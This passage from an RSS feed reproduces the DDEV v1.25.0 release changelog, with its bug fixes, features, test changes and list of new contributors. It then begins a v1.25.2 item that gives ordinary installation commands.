<li>feat(xdebug-diagnose): Add <code>ddev utility xdebug-diagnose</code> command with interactive mode and WSL2 support by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3778517084" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8004" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8004/hovercard" href="https://github.com/ddev/ddev/pull/8004">#8004</a></li>
<li>fix: exclude paused/stopped projects from router's Traefik configuration by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3748548051" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7961" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7961/hovercard" href="https://github.com/ddev/ddev/pull/7961">#7961</a></li>
<li>test(quickstart): fix TYPO3 v14 test [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3834544982" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8044" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8044/hovercard" href="https://github.com/ddev/ddev/pull/8044">#8044</a></li>
<li>fix(pause): resolve race condition in app.Pause() causing intermittent test failures by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3834117681" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8043" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8043/hovercard" href="https://github.com/ddev/ddev/pull/8043">#8043</a></li>
<li>feat(devcontainer): Add more explicit support for non-codespaces devcontainer, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3063729923" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7294" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7294/hovercard" href="https://github.com/ddev/ddev/issues/7294">#7294</a>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3634176464" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7876" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7876/hovercard" href="https://github.com/ddev/ddev/issues/7876">#7876</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3801324251" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8018" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8018/hovercard" href="https://github.com/ddev/ddev/issues/8018">#8018</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3815143833" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8032" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8032/hovercard" href="https://github.com/ddev/ddev/pull/8032">#8032</a></li>
<li>fix: pull all app images at once, initialize XHGui ports and mode if empty, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3811346250" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8023" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8023/hovercard" href="https://github.com/ddev/ddev/issues/8023">#8023</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3838723636" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8046" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8046/hovercard" href="https://github.com/ddev/ddev/pull/8046">#8046</a></li>
<li>fix(webserver): better log-stderr.sh reporting, remove trixie-backports by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3833225571" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8042" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8042/hovercard" href="https://github.com/ddev/ddev/pull/8042">#8042</a></li>
<li>build(deps): bump go.mod and docker-compose to v5.0.2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3837948652" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8045" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8045/hovercard" href="https://github.com/ddev/ddev/pull/8045">#8045</a></li>
<li>test(quickstart): add Wagtail (Django) Python, remove FrankenPHP by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3842725618" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8049" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8049/hovercard" href="https://github.com/ddev/ddev/pull/8049">#8049</a></li>
<li>fix(cakephp): add new variable APP_FULL_BASE_URL to .env file by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ajibarra/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ajibarra">@ajibarra</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3842577307" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8048" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8048/hovercard" href="https://github.com/ddev/ddev/pull/8048">#8048</a></li>
<li>fix(poweroff): Skip poweroff prompt when containers already stopped during version upgrade by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3848144775" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8052" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8052/hovercard" href="https://github.com/ddev/ddev/pull/8052">#8052</a></li>
<li>fix(router): Fix ephemeral port allocation when router is unhealthy, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3830836096" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8041" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8041/hovercard" href="https://github.com/ddev/ddev/issues/8041">#8041</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3847851352" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8051" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8051/hovercard" href="https://github.com/ddev/ddev/pull/8051">#8051</a></li>
<li>feat(add-ons): Use addons.json to avoid GitHub API rate limits, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3508049094" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7707" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7707/hovercard" href="https://github.com/ddev/ddev/issues/7707">#7707</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3760928582" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7978" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7978/hovercard" href="https://github.com/ddev/ddev/pull/7978">#7978</a></li>
<li>build(deps): bump actions/setup-python from 6.1.0 to 6.2.0 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3856858704" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8059" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8059/hovercard" href="https://github.com/ddev/ddev/pull/8059">#8059</a></li>
<li>docs: Update Lagoon provider instructions with sync config, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3768525805" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7990" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7990/hovercard" href="https://github.com/ddev/ddev/issues/7990">#7990</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/froboy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/froboy">@froboy</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3768528261" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7991" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7991/hovercard" href="https://github.com/ddev/ddev/pull/7991">#7991</a></li>
<li>test(quickstart): disable symfony tests, update Laravel SQLite, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3855739168" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8058" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8058/hovercard" href="https://github.com/ddev/ddev/issues/8058">#8058</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3861011927" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8060" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8060/hovercard" href="https://github.com/ddev/ddev/pull/8060">#8060</a></li>
<li>feat(drupal12): Drupal 12 is now showing up in dev, support it, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3852470928" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8055" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8055/hovercard" href="https://github.com/ddev/ddev/issues/8055">#8055</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3852526865" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8056" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8056/hovercard" href="https://github.com/ddev/ddev/pull/8056">#8056</a></li>
<li>fix(ddevapp): check file existence in isCustomConfigFile by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3861764625" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8061" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8061/hovercard" href="https://github.com/ddev/ddev/pull/8061">#8061</a></li>
<li>fix(router): bypass CheckRouterPorts when all ports appear busy, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3693813229" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7921" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7921/hovercard" href="https://github.com/ddev/ddev/issues/7921">#7921</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3706631046" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7927" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7927/hovercard" href="https://github.com/ddev/ddev/pull/7927">#7927</a></li>
<li>docs(drupal-cms): In the Drupal CMS quick-start, call drupal recipe:unpack by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/phenaproxima/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/phenaproxima">@phenaproxima</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3818313021" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8037" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8037/hovercard" href="https://github.com/ddev/ddev/pull/8037">#8037</a></li>
<li>chore(quickstart): enable tests for symfony, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3855739168" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8058" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8058/hovercard" href="https://github.com/ddev/ddev/issues/8058">#8058</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3865724504" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8070" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8070/hovercard" href="https://github.com/ddev/ddev/pull/8070">#8070</a></li>
<li>feat(commands): add Windows support for DBeaver outside WSL, add cygwin to OSTYPE by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ddubau/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ddubau">@ddubau</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3862908143" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8065" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8065/hovercard" href="https://github.com/ddev/ddev/pull/8065">#8065</a></li>
<li>build(docker): bump images to v1.25.0 for release, update MariaDB gpg key by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3862122088" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8062" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8062/hovercard" href="https://github.com/ddev/ddev/pull/8062">#8062</a></li>
<li>fix(lagoon): bug in lagoon-sync means it fails if ~/.ssh/known_hosts doesn't exist [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3866685126" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8072" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8072/hovercard" href="https://github.com/ddev/ddev/pull/8072">#8072</a></li>
<li>fix(healthcheck): resolve optional profiles to services, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3541461422" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7745" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7745/hovercard" href="https://github.com/ddev/ddev/pull/7745">#7745</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3866582672" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8071" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8071/hovercard" href="https://github.com/ddev/ddev/pull/8071">#8071</a></li>
<li>test(quickstart): fix Statamic check for login page by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3867068600" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8073" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8073/hovercard" href="https://github.com/ddev/ddev/pull/8073">#8073</a></li>
<li>test: fix drupal.bats for drupal cms 2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3867749985" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8074" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8074/hovercard" href="https://github.com/ddev/ddev/pull/8074">#8074</a></li>
<li>test: add DDEV_EMBARGO_TESTS to skip tests via environment variable, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3871275997" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8076" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8076/hovercard" href="https://github.com/ddev/ddev/issues/8076">#8076</a> [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3871353826" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8077" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8077/hovercard" href="https://github.com/ddev/ddev/pull/8077">#8077</a></li>
<li>build(webserver): fix check for MariaDB keyring [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3872270038" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8078" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8078/hovercard" href="https://github.com/ddev/ddev/pull/8078">#8078</a></li>
<li>chore: update version history for v1.25.0, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3716704952" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7934" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7934/hovercard" href="https://github.com/ddev/ddev/issues/7934">#7934</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3872319811" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8079" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8079/hovercard" href="https://github.com/ddev/ddev/pull/8079">#8079</a></li>
<li>test: skip TestExtractCurlBody when httpbin.org is unavailable [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3872748552" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8080" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8080/hovercard" href="https://github.com/ddev/ddev/pull/8080">#8080</a></li>
<li>test(openmage): add --no-security-blocking to openmage.bats for Composer 2.9 compatibility [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3888458213" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8092" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8092/hovercard" href="https://github.com/ddev/ddev/pull/8092">#8092</a></li>
<li>chore(github): update PR template by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3887168991" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8089" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8089/hovercard" href="https://github.com/ddev/ddev/pull/8089">#8089</a></li>
<li>fix(heidisql): get basename for postgres library, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3877835266" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8086" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8086/hovercard" href="https://github.com/ddev/ddev/issues/8086">#8086</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3887098479" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8087" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8087/hovercard" href="https://github.com/ddev/ddev/pull/8087">#8087</a></li>
<li>fix(add-on): Re-add the output suggesting ddev restart after add-on, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3887131086" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8088" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8088/hovercard" href="https://github.com/ddev/ddev/issues/8088">#8088</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3887425861" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8090" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8090/hovercard" href="https://github.com/ddev/ddev/pull/8090">#8090</a></li>
<li>docs: add note on restarting for environment variable changes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MurzNN/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MurzNN">@MurzNN</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3889575340" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8093" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8093/hovercard" href="https://github.com/ddev/ddev/pull/8093">#8093</a></li>
<li>fix(add-on): normalize <code>ddev add-on get</code> output when there's no version by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3890604590" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8094" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8094/hovercard" href="https://github.com/ddev/ddev/pull/8094">#8094</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/q0rban/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/q0rban">@q0rban</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3626113413" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7861" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7861/hovercard" href="https://github.com/ddev/ddev/pull/7861">#7861</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BreathCodeFlow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BreathCodeFlow">@BreathCodeFlow</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3658037285" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7893" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7893/hovercard" href="https://github.com/ddev/ddev/pull/7893">#7893</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/crowjake/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/crowjake">@crowjake</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3669387046" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7907" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7907/hovercard" href="https://github.com/ddev/ddev/pull/7907">#7907</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/grummbeer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/grummbeer">@grummbeer</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3633286534" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7872" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7872/hovercard" href="https://github.com/ddev/ddev/pull/7872">#7872</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JUVOJustin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JUVOJustin">@JUVOJustin</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3730518709" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7942" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7942/hovercard" href="https://github.com/ddev/ddev/pull/7942">#7942</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lguigo22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lguigo22">@lguigo22</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3756979012" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7975" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7975/hovercard" href="https://github.com/ddev/ddev/pull/7975">#7975</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codebymikey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codebymikey">@codebymikey</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3789513134" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8008" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8008/hovercard" href="https://github.com/ddev/ddev/pull/8008">#8008</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Franky5831/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Franky5831">@Franky5831</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3622910076" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7853" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7853/hovercard" href="https://github.com/ddev/ddev/pull/7853">#7853</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ddubau/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ddubau">@ddubau</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3862908143" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8065" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8065/hovercard" href="https://github.com/ddev/ddev/pull/8065">#8065</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/ddev/ddev/compare/v1.24.10...v1.25.0"><tt>v1.24.10...v1.25.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.25.2]]></title>
<description><![CDATA[Installation
See the installation instructions for details, but it's easy:

macOS: brew install ddev/ddev/ddev or just brew upgrade ddev.
Linux: Use sudo apt-get update && sudo apt-get install ddev, see apt/yum installation
Windows and WSL2: Download the Windows Installer; you can run it for inst...]]></description>
<link>https://tsecurity.de/de/3497295/downloads/v1252/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497295/downloads/v1252/</guid>
